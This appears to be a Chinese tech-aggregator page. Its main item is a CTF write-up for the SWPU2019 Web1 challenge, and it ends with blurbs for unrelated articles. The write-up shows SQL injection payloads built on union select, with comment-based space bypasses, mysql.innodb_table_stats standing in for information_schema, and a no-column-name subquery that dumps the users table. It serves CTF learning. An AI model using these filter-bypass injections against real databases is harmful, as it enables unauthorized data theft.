news 2026/4/18 5:34:23

[SWPU2019]Web1 1

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
[SWPU2019]Web1 1

一个登录界面 这里测试了一下并没有发现sql注入点

注册了一个账号

最终在广告信息管理中发现sql注入点

开始注入

经过一些简单的测试可知空格 or 等被过滤了,所以这里用group来测列数

这里的闭合方式用 引号' 不然会报错

可以看到列23报错

现在查回显位

-1'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'3

回显位2,3

曝库

-1'/**/union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'3

得到web1库

然后就是报表

但是这里information_schema.tables被过滤,这里有两种绕过姿势

mysql.innodb_table_stats sys.schema_auto_increment_columns
1'/**/union/**/select/**/1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/where/**/database_name="web1"'

接着曝列

但是总是被ban

看了其他师傅的wp知道 要用无列名注入

pyload

-1'/**/union/**/select/**/1,(select/**/group_concat(`2`)/**/from/**/(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users)n),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&&'1'='1

把2改成3即可得到flag

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/18 0:14:56

nVisual模块之间关系

nVisual做为一款数字孪生管理平台,实现网络规划、仿真分析,结合扩展模块可以快速实现一体运维管理。扩展模块主要有:自动发现模块、EXCEL插件、移动端APP、监测模块、多个业务模块(如巡检、资产、工单、业务等)。如下图…

作者头像 李华
网站建设 2026/4/18 5:32:33

COMSOL的多物理场仿真工具箱里藏着电池工程师的快乐密码。今天咱们不聊虚的,直接看几个实操案例。比如锂离子电池的热失控模拟,这个参数设置界面里藏着魔鬼细节

COMSOL电池有限元仿真模拟,包括铅酸电池、锂离子电池、镍金属氢化物电池、固体氧化物燃料电池(SOFC)、直接甲醇燃料电池(DMFC)和质子交换膜燃料电池(PEMFC)等。 可以仿真电极和电解质中的底层电化学,研究不同工作条件、设计下的性能,老化机制…

作者头像 李华
网站建设 2026/4/1 17:56:48

Day38 MLP神经网络的训练

一、PyTorch的安装 我们后续完成深度学习项目中,主要使用的包为pytorch,所以需要安装,需要去配置一个新的环境。 未来在复现具体项目时候,新环境命名最好是python版本_pytorch版本_cuda版本,例如 py3.10_pytorch2.0_cuda12.2 ,因为复杂项目对运行环境有…

作者头像 李华
网站建设 2026/4/14 17:00:25

A860-2000-T351编码器

A860-2000-T351 编码器A860-2000-T351 是一款高精度工业用旋转编码器,主要用于数控系统、伺服驱动器和自动化设备中,为机械设备提供精确的位置信号和速度反馈。主要特点:高精度输出:提供可靠的位置信号,保证运动控制的…

作者头像 李华
网站建设 2026/4/3 5:26:02

STL中容器适配器:stack,queue,priority_queue 的介绍与简单模拟实现

stack(栈) stack的基本介绍 栈(Stack)是一种后进先出(LIFO)的线性数据结构,只能在容器的一端(称为栈顶)进行插入和删除操作。 **核心特性 仅允许在栈顶插入和删除元素不支持随机访问没有迭代器&…

作者头像 李华
网站建设 2026/4/12 21:47:16

DSF-2MW-H编码器

DSF-2MW-H 编码器DSF-2MW-H 是一款高精度工业旋转编码器,用于将机械轴的旋转角度转换为电信号,实现精确的位置、速度和方向反馈。它广泛应用于自动化设备、数控机床、伺服系统和机器人控制中。主要特点:高分辨率输出:确保位置测量…

作者头像 李华